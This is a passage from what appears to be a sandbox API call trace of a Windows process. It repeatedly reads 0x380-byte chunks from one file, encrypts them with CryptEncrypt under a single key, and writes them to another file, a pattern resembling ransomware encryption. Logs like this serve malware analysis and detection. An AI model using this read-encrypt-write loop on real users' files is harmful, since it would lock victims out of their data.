(in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.744] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.749] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, 